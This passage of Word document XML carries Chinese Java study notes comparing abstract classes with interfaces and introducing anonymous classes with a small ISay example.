                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>添加新方法</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3300" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="54" w:type="dxa"/>
              <w:left w:w="54" w:type="dxa"/>
              <w:bottom w:w="54" w:type="dxa"/>
              <w:right w:w="54" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00884B2B" w:rsidRDefault="00884B2B">
            <w:pPr>
              <w:spacing w:line="226" w:lineRule="atLeast"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>如果你往抽象类中添加新的方法，你可以给它提供默认的实现。因此你不需要改变你现在的代码。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2490" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="54" w:type="dxa"/>
              <w:left w:w="54" w:type="dxa"/>
              <w:bottom w:w="54" w:type="dxa"/>
              <w:right w:w="54" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00884B2B" w:rsidRDefault="00884B2B">
            <w:pPr>
              <w:spacing w:line="226" w:lineRule="atLeast"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>如果你往接口中添加方法，那么你必须改变实现该接口的类。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00884B2B" w:rsidRDefault="00884B2B" w:rsidP="00884B2B">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="226" w:lineRule="atLeast"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>如果你拥有一些方法并且想让它们中的一些有默认实现，那么使用抽象类吧。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00884B2B" w:rsidRDefault="00884B2B" w:rsidP="00884B2B">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="226" w:lineRule="atLeast"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>如果你想实现多重继承，那么你必须使用接口。由于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Java不支持多继承</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>，子类不能够继承多个类，但可以实现多个接口。因此你就可以使用接口来解决它。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00884B2B" w:rsidRDefault="00884B2B" w:rsidP="00884B2B">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="226" w:lineRule="atLeast"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>如果基本功能在不断改变，那么就需要使用抽象类。如果不断改变基本功能并且使用接口，那么就需要改变所有实现了该接口的类。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00415333" w:rsidRPr="00311B38" w:rsidRDefault="00884B2B" w:rsidP="00311B38">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="215" w:afterAutospacing="0" w:line="226" w:lineRule="atLeast"/>
        <w:ind w:firstLine="300"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Oracle已经开始尝试向接口中引入默认方法和静态方法，以此来减少抽象类和接口之间的差异。现在，我们可以为接口提供默认实现的方法了并且不用强制子类来实现它。这类内容我将在下篇博客进行阐述。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F3B8D" w:rsidRDefault="00563FFB" w:rsidP="00A300DA">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1.1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>18</w:t>
      </w:r>
      <w:r w:rsidR="008643CD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="006C6678">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>匿名类</w:t>
      </w:r>
      <w:r w:rsidR="008643CD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、内部类、静态类</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008643CD" w:rsidRPr="00D02A2B" w:rsidRDefault="00FC7E36" w:rsidP="00D02A2B">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.1.18</w:t>
      </w:r>
      <w:r w:rsidR="00D02A2B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">.1 </w:t>
      </w:r>
      <w:r w:rsidR="00D02A2B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>匿名类</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003339FC" w:rsidRDefault="003339FC" w:rsidP="003339FC">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="107" w:beforeAutospacing="0" w:after="107" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>中的匿名类有一个倍儿神奇的用法，见下面代码示例</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003339FC" w:rsidRDefault="003339FC" w:rsidP="003339FC">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="008080"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>package</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> contract;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003339FC" w:rsidRDefault="003339FC" w:rsidP="003339FC">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="008080"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003339FC" w:rsidRDefault="003339FC" w:rsidP="003339FC">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="008080"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>interface</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> ISay {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003339FC" w:rsidRDefault="003339FC" w:rsidP="003339FC">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="008080"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> sayHello();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003339FC" w:rsidRDefault="003339FC" w:rsidP="003339FC">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="008080"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003339FC" w:rsidRDefault="003339FC" w:rsidP="003339FC">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="107" w:beforeAutospacing="0" w:after="107" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>上面是一个简单的接口，下面是如何使用：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003339FC" w:rsidRDefault="003339FC" w:rsidP="003339FC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:noProof/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="191135" cy="191135"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="208" name="图片 5" descr="复制代码">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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复制代码">
                      <a:hlinkClick r:id="rId10" tooltip="&quot;复制代码&quot;"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="191135" cy="191135"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003339FC" w:rsidRDefault="003339FC" w:rsidP="003339FC">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="008080"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>package</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> jimmy;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003339FC" w:rsidRDefault="003339FC" w:rsidP="003339FC">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="008080"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> contract.ISay;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003339FC" w:rsidRDefault="003339FC" w:rsidP="003339FC">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="008080"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Program {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003339FC" w:rsidRDefault="003339FC" w:rsidP="003339FC">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="008080"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003339FC" w:rsidRDefault="003339FC" w:rsidP="003339FC">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="008080"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">         ISay say = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> ISay() {          </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003339FC" w:rsidRDefault="003339FC" w:rsidP="003339FC">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="008080"/>
        </w:rPr>
        <w:t xml:space="preserve"> 6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">             </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> sayHello() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003339FC" w:rsidRDefault="003339FC" w:rsidP="003339FC">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="008080"/>
        </w:rPr>
        <w:t xml:space="preserve"> 7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">                 System.out.println("Hello java!");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003339FC" w:rsidRDefault="003339FC" w:rsidP="003339FC">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="008080"/>
        </w:rPr>
        <w:t xml:space="preserve"> 8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">             }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003339FC" w:rsidRDefault="003339FC" w:rsidP="003339FC">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="008080"/>
        </w:rPr>
        <w:t xml:space="preserve"> 9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">         };</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003339FC" w:rsidRDefault="003339FC" w:rsidP="003339FC">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="008080"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">     }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003339FC" w:rsidRDefault="003339FC" w:rsidP="003339FC">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="008080"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003339FC" w:rsidRDefault="003339FC" w:rsidP="003339FC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:noProof/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="191135" cy="191135"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="207" name="图片 6" descr="复制代码">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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复制代码">
                      <a:hlinkClick r:id="rId10" tooltip="&quot;复制代码&quot;"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="191135" cy="191135"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
